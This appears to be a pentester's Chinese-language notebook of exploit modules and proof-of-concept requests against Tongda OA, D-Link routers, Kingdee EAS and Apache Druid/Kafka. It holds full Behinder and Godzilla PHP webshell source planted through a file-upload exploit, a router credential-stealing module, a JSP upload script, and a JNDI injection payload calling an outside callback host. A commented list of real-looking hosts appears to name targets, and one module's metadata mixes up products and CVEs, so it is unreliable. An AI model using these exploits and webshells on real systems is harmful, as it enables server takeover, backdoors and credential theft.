CONFIG%5bcatcherPathFormat%5d=/api/test64AA43fAa7&CONFIG%5bcatcherMaxSize%5d=100000&CONFIG%5bcatcherAllowFiles%5d%5b%5d=.php&CONFIG%5bcatcherAllowFiles%5d%5b%5d=.ico&CONFIG%5bcatcherFieldName%5d=file&file[]=http://gobygo.net/i/7ebb93754e477ad5/qBqacYBmhXemraMY.png#.php

http://gobygo.net/i/7ebb93754e477ad5/qBqacYBmhXemraMY.png这个是上传的文件内容，test64AA43fAa7这个是文件名，.php这个是php文件

访问上传的文件

GET /api/test64AA43fAa7.php HTTP/1.1
Host: 47.88.168.12:82
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close

go的POC

package exploits

import (
	"bytes"
	"git.gobies.org/goby/goscanner/godclient"
	"git.gobies.org/goby/goscanner/goutils"
	"git.gobies.org/goby/goscanner/jsonvul"
	"git.gobies.org/goby/goscanner/scanconfig"
	"git.gobies.org/goby/httpclient"
	"math/rand"
	"strings"
)

func init() {
	expJson := `{
  "Name": "TongdaOA action_crawler.php 文件上传漏洞",
  "Description": "<p>通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化系统，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。</p><p>通达OA2017-v20200417版本的action_crawler.php文件存在文件上传漏洞，攻击者可以利用文件上传漏洞执行恶意代码、写入后门、读取敏感文件，从而可能导致服务器受到攻击并被控制。</p>",
  "Product": "通达oa",
  "Homepage": "https://www.tongda2000.com/",
  "DisclosureDate": "2022-08-10",
  "Author": "2737977997@qq.com",
  "FofaQuery": "body=\"/static/templates/2013_01/index.css/\" || body=\"javascript:document.form1.UNAME.focus()\" || body=\"href=\\\"/static/images/tongda.ico\\\"\" || body=\"<link rel=\\\"shortcut icon\\\" href=\\\"/images/tongda.ico\\\" />\" || (body=\"OA提示：不能登录OA\" && body=\"紧急通知：今日10点停电\") || title=\"Office Anywhere 2013\" || title=\"Office Anywhere 2015\" || (body=\"tongda.ico\" && (title=\"OA\" || title=\"办公\")) || body=\"class=\\\"STYLE1\\\">新OA办公系统\"",
  "GobyQuery": "body=\"/static/templates/2013_01/index.css/\" || body=\"javascript:document.form1.UNAME.focus()\" || body=\"href=\\\"/static/images/tongda.ico\\\"\" || body=\"<link rel=\\\"shortcut icon\\\" href=\\\"/images/tongda.ico\\\" />\" || (body=\"OA提示：不能登录OA\" && body=\"紧急通知：今日10点停电\") || title=\"Office Anywhere 2013\" || title=\"Office Anywhere 2015\" || (body=\"tongda.ico\" && (title=\"OA\" || title=\"办公\")) || body=\"class=\\\"STYLE1\\\">新OA办公系统\"",
  "Level": "3",
  "Impact": "<p>通达OA2017-v20200417版本的action_crawler.php文件存在文件上传漏洞，攻击者可以利用文件上传漏洞执行恶意代码、写入后门、读取敏感文件，从而可能导致服务器受到攻击并被控制。<br></p>",
  "Recommendation": "<p>1、官方已修复该漏洞，请用户升级至11.x或者12.x最新版（2017未修复）：<a href=\"https://www.tongda2000.com/\">https://www.tongda2000.com/</a></p><p>2、部署Web应用防火墙，对文件操作进行监控。</p><p>3、如非必要，禁止公网访问该系统。</p>",
  "References": [
    "https://www.tongda2000.com/"
  ],
  "Is0day": false,
  "HasExp": true,
  "ExpParams": [
    {
      "name": "attackType",
      "type": "select",
      "value": "webshell",
      "show": ""
    },
    {
      "name": "webshell",
      "type": "select",
      "value": "behinder,godzilla,custom",
      "show": "attackType=webshell"
    },
    {
      "name": "filename",
      "type": "input",
      "value": "hello12341x.php",
      "show": "attackType=webshell,webshell=custom"
    },
    {
      "name": "content",
      "type": "input",
      "value": "<?php echo \"hello\" ; ?>",
      "show": "attackType=webshell,webshell=custom"
    }
  ],
  "ExpTips": {
    "Type": "",
    "Content": ""
  },
  "ScanSteps": [
    "AND",
    {
      "Request": {
        "method": "POST",
        "uri": "",
        "follow_redirect": false,
        "header": {},
        "data_type": "text",
        "data": ""
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": []
      },
      "SetVariable": []
    }
  ],
  "ExploitSteps": [
    "AND",
    {
      "Request": {
        "method": "POST",
        "uri": "",
        "follow_redirect": false,
        "header": {},
        "data_type": "text",
        "data": ""
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": []
      },
      "SetVariable": []
    },
    {
      "Request": {
        "method": "POST",
        "uri": "/api/upload_crawler.php",
        "follow_redirect": false,
        "header": {
          "Content-Type": "application/x-www-form-urlencoded"
        },
        "data_type": "text",
        "data": "{{{param}}}={{{cmd}}}"
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          }
        ]
      },
      "SetVariable": [
        "output|lastbody|regex|([\\w\\W]+)"
      ]
    }
  ],
  "Tags": [
    "文件上传"
  ],
  "VulType": [
    "文件上传"
  ],
  "CVEIDs": [],
  "CNNVD": [],
  "CNVD": [],
  "CVSSScore": "10.0",
  "Translation": {
    "CN": {
      "Name": "TongdaOA action_crawler.php 文件上传漏洞",
      "Product": "通达oa",
      "Description": "<p>通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化系统，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。</p><p>通达OA2017-v20200417版本的action_crawler.php文件存在文件上传漏洞，攻击者可以利用文件上传漏洞执行恶意代码、写入后门、读取敏感文件，从而可能导致服务器受到攻击并被控制。</p>",
      "Recommendation": "<p>1、官方已修复该漏洞，请用户升级至11.x或者12.x最新版（2017未修复）：<a href=\"https://www.tongda2000.com/\">https://www.tongda2000.com/</a></p><p>2、部署Web应用防火墙，对文件操作进行监控。</p><p>3、如非必要，禁止公网访问该系统。</p>",
      "Impact": "<p>通达OA2017-v20200417版本的action_crawler.php文件存在文件上传漏洞，攻击者可以利用文件上传漏洞执行恶意代码、写入后门、读取敏感文件，从而可能导致服务器受到攻击并被控制。<br></p>",
      "VulType": [
        "文件上传"
      ],
      "Tags": [
        "文件上传"
      ]
    },
    "EN": {
      "Name": "TongdaOA action_crawler.php File Upload Vulnerability",
      "Product": "TongdaOA",
      "Description": "<p>Office Anywhere (Office Anywhere Network Intelligent Office System) is a collaborative office automation system independently developed by Beijing Tongda Information Technology Co., Ltd. It includes process approval, administrative office, daily affairs, data statistical analysis, instant messaging, mobile office, etc.</p><p>Action for Tongda OA2017-v20200417 version_ There is a file upload vulnerability in the crawler. PHP file, which can be exploited by attackers to execute malicious code, write backdoors, and read sensitive files, potentially leading to server attacks and control.</p>",
      "Recommendation": "<p>1. The vulnerability has been officially fixed, please upgrade to the latest version of 11.x or 12.x (not fixed in 2017): <a href=\"https://www.tongda2000.com/\">https://www.tongda2000.com/</a></p><p>2. Deploy a web application firewall to monitor file operations.</p><p>3. If it is not necessary, it is forbidden to access the system from the public network.</p>",
      "Impact": "<p>Action for Tongda OA2017-v20200417 version_ There is a file upload vulnerability in the crawler. PHP file, which can be exploited by attackers to execute malicious code, write backdoors, and read sensitive files, potentially leading to server attacks and control.<br><br></p>",
      "VulType": [
        "File Upload"
      ],
      "Tags": [
        "File Upload"
      ]
    }
  },
  "AttackSurfaces": {
    "Application": null,
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": null
  }
}`
	randomStringfMsBHs9Cf := func(size int) string {
		alpha := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
		var buffer bytes.Buffer
		for i := 0; i < size; i++ {
			buffer.WriteByte(alpha[rand.Intn(len(alpha))])
		}
		return buffer.String()
	}

	verifyUploadedFilesfMsBHs9Cf := func(hostInfo *httpclient.FixUrl, filename, content string) (*httpclient.HttpResponse, error) {
		authenticationRequest := httpclient.NewGetRequestConfig("/api/" + filename + ".php")
		authenticationRequest.VerifyTls = false
		authenticationRequest.FollowRedirect = false
		return httpclient.DoHttpRequest(hostInfo, authenticationRequest)
	}

	uploadFlagsfMsBHs9Cf := func(hostInfo *httpclient.FixUrl, filename, content string) (int, error) {
		var localConfig int
		// 上传文件
		err := godclient.HostFile(randomStringfMsBHs9Cf(16)+".png", content, func(fileURL string) error {
			uploadRequestConfig := httpclient.NewPostRequestConfig(`/module/ueditor/php/action_crawler.php`)
			uploadRequestConfig.Header.Store("Content-Type", "application/x-www-form-urlencoded")
			uploadRequestConfig.VerifyTls = false
			uploadRequestConfig.FollowRedirect = false
			uploadRequestConfig.Data = "CONFIG%5bcatcherPathFormat%5d=/api/" + filename + "&CONFIG%5bcatcherMaxSize%5d=100000&CONFIG%5bcatcherAllowFiles%5d%5b%5d=.php&CONFIG%5bcatcherAllowFiles%5d%5b%5d=.ico&CONFIG%5bcatcherFieldName%5d=file&file[]=" + fileURL + "#.php"
			resp, err := httpclient.DoHttpRequest(hostInfo, uploadRequestConfig)
			localConfig = resp.StatusCode
			return err
		})
		return localConfig, err
	}

	ExpManager.AddExploit(NewExploit(
		goutils.GetFileName(),
		expJson,
		func(exp *jsonvul.JsonVul, hostInfo *httpclient.FixUrl, stepLogs *scanconfig.SingleScanConfig) bool {
			fileName := "test" + goutils.RandomHexString(10)
			content := goutils.RandomHexString(10)
			localConfig, _ := uploadFlagsfMsBHs9Cf(hostInfo, fileName, `<?php @error_reporting(0);echo "`+content+`";unlink(__FILE__);?>`)
			resp, _ := verifyUploadedFilesfMsBHs9Cf(hostInfo, fileName, content)
			return strings.Contains(resp.Utf8Html, content) && localConfig == 200
		},
		func(expResult *jsonvul.ExploitResult, stepLogs *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
			attackType := goutils.B2S(stepLogs.Params["attackType"])
			if attackType == "webshell" {
				fileName := "test" + goutils.RandomHexString(10)
				check := goutils.RandomHexString(10)
				var content string
				webshell := goutils.B2S(stepLogs.Params["webshell"])
				if webshell == "behinder" {
					content = `<?php @error_reporting(0);session_start();$key="e45e329feb5d925b";$_SESSION['k']=$key;session_write_close();$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++){$post[$i]=$post[$i]^$key[$i+1&15];}}else{$post=openssl_decrypt($post,"AES128",$key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p){eval($p."");}}@call_user_func(new C(),$params);echo "` + check + `";?>`
				} else if webshell == "godzilla" {
					content = `<?php @session_start();@set_time_limit(0);@error_reporting(0);function encode($D,$K){for($i=0;$i<strlen($D);$i++){$c=$K[$i+1&15];$D[$i]=$D[$i]^$c;}return $D;}$pass='pass';$payloadName='payload';$key='3c6e0b8a9c15224a';if(isset($_POST[$pass])){$data=encode(base64_decode($_POST[$pass]),$key);if(isset($_SESSION[$payloadName])){$payload=encode($_SESSION[$payloadName],$key);if(strpos($payload,"getBasicsInfo")===false){$payload=encode($payload,$key);}eval($payload);echo substr(md5($pass.$key),0,16);echo base64_encode(encode(@run($data),$key));echo substr(md5($pass.$key),16);}else{if(strpos($data,"getBasicsInfo")!==false){$_SESSION[$payloadName]=encode($data,$key);}}}echo "` + check + `";?>`
				} else if webshell == "custom" {
					content = goutils.B2S(stepLogs.Params["content"])
					fileName = goutils.B2S(stepLogs.Params["filename"])
				} else {
					expResult.Output = `未知的利用方式`
					return expResult
				}
				localConfig, err := uploadFlagsfMsBHs9Cf(expResult.HostInfo, fileName, content)
				if err != nil {
					expResult.Output = err.Error()
					return expResult
				}
				resp, err := verifyUploadedFilesfMsBHs9Cf(expResult.HostInfo, fileName, content)
				if err != nil {
					expResult.Output = err.Error()
					return expResult
				} else if strings.Contains(resp.Utf8Html, check) && localConfig == 200 && (webshell == "behinder" || webshell == "godzilla") {
					expResult.Success = true
					expResult.Output = "WebShell URL: " + expResult.HostInfo.FixedHostInfo + "/api/" + fileName + ".php\n"
					if webshell == "behinder" {
						expResult.Output += "Password: rebeyond\n"
						expResult.Output += "WebShell tool: Behinder v3.0\n"
					} else if webshell == "godzilla" {
						expResult.Output += "Password: pass 加密器：PHP_XOR_BASE64\n"
						expResult.Output += "WebShell tool: Godzilla v4.1\n"
					}
					expResult.Output += "Webshell type: php"
				} else if webshell == "custom" && localConfig == 200 {
					expResult.Success = true
					expResult.Output = "WebShell URL: " + expResult.HostInfo.FixedHostInfo + "/api/" + fileName + ".php\n"
				} else {
					expResult.Output = `漏洞利用失败`
				}
			} else {
				expResult.Success = false
				expResult.Output = "未知的利用方式"
			}
			return expResult
		},
	))
}

package exploits

import (
	"errors"
	"git.gobies.org/goby/goscanner/goutils"
	"git.gobies.org/goby/goscanner/jsonvul"
	"git.gobies.org/goby/goscanner/scanconfig"
	"git.gobies.org/goby/httpclient"
	"regexp"
	"strings"
)

func init() {
	expJson := `{
	 "Name": "D-Link Go-RT-AC750 hedwig.cgi 命令注入漏洞（CVE-2023-48842）",
	 "Description": "<p>Montala ResourceSpace是英国Montala公司的一种开源数字资产管理工具。<br></p><p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">ResourceSpace 9.5 以及之前版本&nbsp;add_keyword.php 文件的 k 参数存在 sql 注入漏洞。攻击者可以获取ResourceSpace数据库的全部内容，包括用户会话cookie。</span><br></p>",
	 "Product": "ResourceSpace",
	 "Homepage": "https://www.resourcespace.com/",
	 "DisclosureDate": "2021-09-27",
	 "Author": "2075068490@qq.com",
	 "FofaQuery": "\"Go-RT-AC750\"",
	 "GobyQuery": "\"Go-RT-AC750\"",
	 "Level": "3",
	 "Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">该漏洞允许攻击者获取 ResourceSpace 数据库的完整内容，包括用户会话 cookie。</span><br></p>",
	 "Recommendation": "<p>厂商已发布解决方案，请更新到最新版本：<a href=\"https://www.resourcespace.com/get\" target=\"_blank\">https://www.resourcespace.com/get</a><br></p>",
	 "References": [
	   "https://www.horizon3.ai/multiple-vulnerabilities-in-resourcespace/"
	 ],
	 "Is0day": false,
	 "HasExp": true,
	 "ExpParams": [],
	 "ExpTips": {
	   "Type": "",
	   "Content": ""
	 },
	 "ScanSteps": [
	   "AND",
	   {
	     "Request": {
	       "method": "GET",
	       "uri": "",
	       "follow_redirect": false,
	       "header": {},
	       "data_type": "text",
	       "data": ""
	     },
	     "ResponseTest": {
	       "type": "group",
	       "operation": "AND",
	       "checks": []
	     },
	     "SetVariable": []
	   }
	 ],
	 "ExploitSteps": [
	   "AND",
	   {
	     "Request": {
	       "method": "GET",
	       "uri": "",
	       "follow_redirect": false,
	       "header": {},
	       "data_type": "text",
	       "data": ""
	     },
	     "ResponseTest": {
	       "type": "group",
	       "operation": "AND",
	       "checks": []
	     },
	     "SetVariable": []
	   }
	 ],
	 "Tags": [],
	 "VulType": [
	   "SQL注入"
	 ],
	 "CVEIDs": [
	   "CVE-2021-41765"
	 ],
	 "CNNVD": [
	   "CNNVD-202111-1222"
	 ],
	 "CNVD": [
	   "CNVD-2021-103102"
	 ],
	 "CVSSScore": "9.8",
	 "Translation": {
	   "CN": {
	     "Name": "D-Link Go-RT-AC750 hedwig.cgi 命令注入漏洞（CVE-2023-48842）",
	     "Product": "ResourceSpace",
	     "Description": "<p>Montala ResourceSpace是英国Montala公司的一种开源数字资产管理工具。<br></p><p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">ResourceSpace 9.5 以及之前版本&nbsp;add_keyword.php 文件的 k 参数存在 sql 注入漏洞。攻击者可以获取ResourceSpace数据库的全部内容，包括用户会话cookie。</span><br></p>",
	     "Recommendation": "<p>厂商已发布解决方案，请更新到最新版本：<a href=\"https://www.resourcespace.com/get\" target=\"_blank\">https://www.resourcespace.com/get</a><br></p>",
	     "Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">该漏洞允许攻击者获取 ResourceSpace 数据库的完整内容，包括用户会话 cookie。</span><br></p>",
	     "VulType": [
	       "SQL注入"
	     ],
	     "Tags": []
	   },
	   "EN": {
	     "Name": "ResourceSpace add_keyword.php k SQL Injection Vulnerability (CVE-2021-41765)",
	     "Product": "ResourceSpace",
	     "Description": "<p>Montala ResourceSpace is an open source digital asset management tool from Montala, UK.<br></p><p>SQL injection vulnerability exists in the k parameter of the add_keyword.php file in ResourceSpace 9.5 and earlier versions. An attacker can obtain the entire contents of the ResourceSpace database, including user session cookies.<br></p>",
	     "Recommendation": "<p>The manufacturer has released a solution, please update to the latest version: <a href=\"https://www.resourcespace.com/get\" target=\"_blank\">https://www.resourcespace.com/get</a><br></p>",
	     "Impact": "<p>This vulnerability allows an attacker to obtain the complete content of the ResourceSpace database, including user session cookies.<br></p>",
	     "VulType": [
	       "SQL Injection"
	     ],
	     "Tags": []
	   }
	 },
	 "AttackSurfaces": {
	   "Application": null,
	   "Support": null,
	   "Service": null,
	   "System": null,
	   "Hardware": null
	 }
	}`
	getUserPasswordFlaggdshjab213dhjas := func(hostinfo *httpclient.FixUrl) (string, string, error) {
		payloadRequestConfig := httpclient.NewPostRequestConfig("/hedwig.cgi")
		payloadRequestConfig.VerifyTls = false
		payloadRequestConfig.FollowRedirect = false
		payloadRequestConfig.Header.Store("Content-Type", "text/xml")
		payloadRequestConfig.Header.Store("Cookie", "uid=123")
		payloadRequestConfig.Data = `<?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>`
		resp, err := httpclient.DoHttpRequest(hostinfo, payloadRequestConfig)
		if err != nil {
			return "", "", err
		}
		if strings.Contains(resp.Utf8Html, "==OoXxGgYy==") {
			return "", "", errors.New("漏洞利用失败")
		}
		ldapAmavisPasswordMatchResult := regexp.MustCompile(`<password>(.*?)</password>`).FindStringSubmatch(resp.Utf8Html)
		if len(ldapAmavisPasswordMatchResult) < 2 {
			return "", "", errors.New("漏洞利用失败")
		}
		usernameMatchResult := regexp.MustCompile(`<name>(.*?)</name>`).FindStringSubmatch(resp.Utf8Html)
		if len(usernameMatchResult) < 2 {
			return "", "", errors.New("漏洞利用失败")
		}
		username := usernameMatchResult[1]
		password := ldapAmavisPasswordMatchResult[1]

		return username, password, nil
	}
	//getUserPasswordFlaggdshjab213dhjas := func(hostinfo *httpclient.FixUrl) (*httpclient.HttpResponse, error) {
	//	payloadRequestConfig := httpclient.NewPostRequestConfig("/hedwig.cgi")
	//	payloadRequestConfig.VerifyTls = false
	//	payloadRequestConfig.FollowRedirect = false
	//	payloadRequestConfig.Header.Store("Content-Type", "text/xml")
	//	payloadRequestConfig.Header.Store("Cookie", "uid=123")
	//	payloadRequestConfig.Data = `<?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>`
	//	return httpclient.DoHttpRequest(hostinfo, payloadRequestConfig)
	//}
	ExpManager.AddExploit(NewExploit(
		goutils.GetFileName(),
		expJson,
		func(exp *jsonvul.JsonVul, hostInfo *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
			_, _, err := getUserPasswordFlaggdshjab213dhjas(hostInfo)
			return err == nil
		},
		func(expResult *jsonvul.ExploitResult, stepLogs *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
			attackType := goutils.B2S(stepLogs.Params["attackType"])
			if attackType == "password" {
				username, password, err := getUserPasswordFlaggdshjab213dhjas(expResult.HostInfo)
				if err != nil {
					expResult.Output = err.Error()
				} else {
					expResult.Success = true
					expResult.Output = "username: " + username + "\n" + "password: " + password
				}
			}
			return expResult
		},
	))
}

//http://20.63.78.220
//http://20.187.82.116
//https://dam.brand-database.com
//http://iam-aherfgoed.movingmedia.eu
//http://dam.barth1873.de
//https://20.163.163.172
//https://redrowresourcespace.drpgroup.com
//https://resourcespace.edsonevers.net
//https://meddb01.verpoorten.de
//http://54.82.61.42
//http://34.192.13.13
//http://images.case-mate.com
//https://filmarchiv.ppzv.de
//https://18.117.201.49
//https://bildarchiv.ppzv.de
//https://phototheque.unistra.fr
//https://gallery.lasierra.edu
//https://media2.aeidl.eu
//https://ideateca.fundesplai.org
//https://mam.wi-bo.com

金碟EAS myUploadFile.do接口处任意文件上传

别人写的POC

# -*- coding: utf-8 -*-
import urllib.request
import sys
if __name__=="__main__":
	if(len(sys.argv)<2):
		print("usage: python3 test.py http://xx.x.x.x:6888")
	else:
		url=sys.argv[1]
		target=url+"/easportal/buffalo/%2e%2e/cm/myUploadFile.do"
		datastr="----WebKitFormBoundarydSvxXKRkrZuWduJl\r\nContent-Disposition: form-data; name=\"myFile\"; filename=\"h2.jsp\"\r\nContent-Type: image/plain\r\n\r\n<%out.println(\"Your IP address is \" + request.getRemoteAddr());%>\r\n----WebKitFormBoundarydSvxXKRkrZuWduJl--"
		headers = { "User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0","Referer":"http://yunzhijia.com","Content-Type":"multipart/form-data; boundary=--WebKitFormBoundarydSvxXKRkrZuWduJl"}
		req =urllib.request.Request(url=target,headers=headers,data=bytes(datastr, encoding='utf-8'))
		page = urllib.request.urlopen(req)
		if(page.status==200):
			print("文件上传成功:"+url+"/easportal/buffalo/%2e%2e/h2.jsp")
		else:
			print("文件上传失败")
			print(page.status)

发送的数据包

POST /easportal/buffalo/%2e%2e/cm/myUploadFile.do HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Length: 242
Host: wp.zssp.top:6888
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: http://yunzhijia.com
Content-Type: multipart/form-data; boundary=--WebKitFormBoundarydSvxXKRkrZuWduJl
Connection: close

----WebKitFormBoundarydSvxXKRkrZuWduJl
Content-Disposition: form-data; name="myFile"; filename="h2.jsp"
Content-Type: image/plain

<%out.println("Your IP address is " + request.getRemoteAddr());%>
----WebKitFormBoundarydSvxXKRkrZuWduJl--

Apache Kafka Connect JNDI注入漏洞 (CVE-2023-25194)

Apache Kafka Connect JNDI注入漏洞 (CVE-2023-25194).md

环境搭建

源码下载：https://codeload.github.com/apache/druid/zip/druid-0.19.0

程序下载：https://archive.apache.org/dist/druid/0.19.0/apache-druid-0.19.0-bin.tar.gz

1、设置调试

编辑这个文件

1	vim /apache-druid-0.19.0/conf/druid/single-server/micro-quickstart/coordinator-overlord/jvm.config

添加到最下面

1	-Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=5005

2、启动

1	./start-micro-quickstart

docker搭建

这个我没有构建调试！

1 2	sudo docker pull vulhub/apache-druid:25.0.0 sudo docker run -d -p 8882:8888 vulhub/apache-druid:25.0.0

Kafka介绍

Apache Kafka 是一种分布式数据存储，经过优化以实时提取和处理流数据。流数据是指由数千个数据源持续生成的数据，通常可同时发送数据记录。流平台需要处理这些持续流入的数据，按照顺序逐步处理。

Kafka 为其用户提供三项主要功能：

发布和订阅记录流
按照记录的生成顺序高效地存储记录流
实时处理记录流

我简单说两个案例，比如你订阅了一个账号当这个账号发布了新的文章我们可以收看这个文章了，比如在抖音中你会收到关注的人发布了新作品的提醒，这样你就可以及时地浏览新的内容。

漏洞的功能点

漏洞POC

POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 172.16.30.44:8882
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 1367
Content-Type: application/json
Accept-Encoding: gzip, deflate
Connection: close

{
    "type":"kafka",
    "spec":{
        "type":"kafka",
        "ioConfig":{
            "type":"kafka",
            "consumerProperties":{
                "bootstrap.servers":"127.0.0.1:6666",
                "sasl.mechanism":"SCRAM-SHA-256",
                "security.protocol":"SASL_SSL",
                "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://ldap://n847zu.dnslog.cn\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
            },
            "topic":"test",
            "useEarliestOffset":true,
            "inputFormat":{
                "type":"regex",
                "pattern":"([\\s\\S]*)",
                "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
                "columns":[
                    "raw"
                ]
            }
        },
        "dataSchema":{
            "dataSource":"sample",
            "timestampSpec":{
                "column":"!!!_no_such_column_!!!",
                "missingValue":"1970-01-01T00:00:00Z"
            },
            "dimensionsSpec":{

            },
            "granularitySpec":{
                "rollup":false
            }
        },
        "tuningConfig":{
            "type":"kafka"
        }
    },
    "samplerConfig":{
        "numRows":500,
        "timeoutMs":15000
    }
}

漏洞分析

进入容器

1	sudo docker exec -it bdb513518b4f /bin/bash

安装基本工具

apt update
apt install net-tools vim

tail -f coordinator-overlord.log

参考

https://www.anquanke.com/post/id/235831#:~:text=CVE-2021-25646%20Apache%20Druid%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%201%20%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86%20Druid%20Apache,post%20%E6%9E%84%E9%80%A0%E4%B8%80%E4%B8%AAfiliter%EF%BC%8C%E5%B0%B1%E5%8F%AF%E4%BB%A5%E5%AE%8C%E6%88%90RCE%E4%BA%86%2C%20...%205%20%E4%BF%AE%E5%A4%8D%E6%80%9D%E8%B7%AF%20%E5%AE%98%E6%96%B9%E7%9A%84%E4%BF%AE%E5%A4%8D%E6%80%9D%E8%B7%AF%E6%98%AF%E5%9C%A8%E4%BB%BB%E4%BD%95%E6%83%85%E5%86%B5%E4%B8%8B%E9%83%BD%E4%B8%8D%E5%85%81%E8%AE%B8%E7%A9%BA%E9%94%AE%E5%80%BC%E8%A2%AB%E4%BC%A0%E5%85%A5%E8%B5%8B%E5%80%BC%EF%BC%8C%E9%87%8D%E5%86%99%E4%BA%86%E6%96%B9%E6%B3%95%20findPropertyIgnorals%20

pgAdmin4 <= 8.4 后台远程命令执行漏洞 (CVE-2024-3116)

下载pgadmin4 8.4版本，这个安装很简单一直下一步就可以

安装python环境，这个我安装的是python 3.8版本